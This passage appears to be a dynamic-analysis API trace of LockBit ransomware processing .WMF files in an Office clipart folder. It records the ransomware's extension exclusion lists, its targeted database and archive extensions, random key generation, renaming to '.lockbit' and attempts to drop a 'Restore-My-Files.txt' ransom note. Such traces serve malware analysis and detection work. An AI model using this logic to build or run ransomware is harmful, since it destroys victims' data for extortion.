lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.414] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF.lockbit") returned 72 [0153.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239057.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.416] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.416] malloc (_Size=0x40068) returned 0x3df0008 [0153.416] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4740) returned 1 [0153.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.417] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.422] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.422] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.422] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.423] free (_Block=0x1fa2ed8) [0153.423] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.423] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.423] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.423] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239063.WMF", cAlternateFileName="")) returned 1 [0153.423] lstrcmpiW (lpString1=".", lpString2="J0239063.WMF") returned -1 [0153.423] lstrcmpiW (lpString1="..", lpString2="J0239063.WMF") returned -1 [0153.423] PathFindExtensionW (pszPath="J0239063.WMF") returned=".WMF" [0153.423] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.424] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.425] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.425] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239063.WMF") returned 1 [0153.425] lstrcmpiW (lpString1="ntldr", lpString2="J0239063.WMF") returned 1 [0153.425] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239063.WMF") returned 1 [0153.425] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239063.WMF") returned -1 [0153.425] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239063.WMF") returned -1 [0153.426] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239063.WMF") returned 1 [0153.426] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239063.WMF") returned -1 [0153.426] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.426] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF") returned=".WMF" [0153.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.426] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.426] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.427] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.427] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.427] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.427] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.427] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.427] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.427] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF.lockbit") returned 72 [0153.427] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239063.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.428] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.428] malloc (_Size=0x40068) returned 0x3df0008 [0153.428] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5884) returned 1 [0153.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.429] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.434] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.434] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.434] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.435] free (_Block=0x1fa2ed8) [0153.435] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239063.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.435] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.435] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.435] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1294, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239079.WMF", cAlternateFileName="")) returned 1 [0153.436] lstrcmpiW (lpString1=".", lpString2="J0239079.WMF") returned -1 [0153.436] lstrcmpiW (lpString1="..", lpString2="J0239079.WMF") returned -1 [0153.436] PathFindExtensionW (pszPath="J0239079.WMF") returned=".WMF" [0153.436] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.436] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.437] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.437] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239079.WMF") returned 1 [0153.438] lstrcmpiW (lpString1="ntldr", lpString2="J0239079.WMF") returned 1 [0153.438] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239079.WMF") returned 1 [0153.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239079.WMF") returned -1 [0153.438] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239079.WMF") returned -1 [0153.438] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239079.WMF") returned 1 [0153.438] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239079.WMF") returned -1 [0153.438] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.438] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF") returned=".WMF" [0153.438] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.438] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.438] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.439] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.439] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF.lockbit") returned 72 [0153.439] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239079.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.440] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.440] malloc (_Size=0x40068) returned 0x3df0008 [0153.440] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4756) returned 1 [0153.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.442] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.451] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.451] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.452] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.453] free (_Block=0x1fa2ed8) [0153.453] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239079.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.453] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.453] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.453] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1464, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239191.WMF", cAlternateFileName="")) returned 1 [0153.453] lstrcmpiW (lpString1=".", lpString2="J0239191.WMF") returned -1 [0153.453] lstrcmpiW (lpString1="..", lpString2="J0239191.WMF") returned -1 [0153.453] PathFindExtensionW (pszPath="J0239191.WMF") returned=".WMF" [0153.453] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.453] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.454] 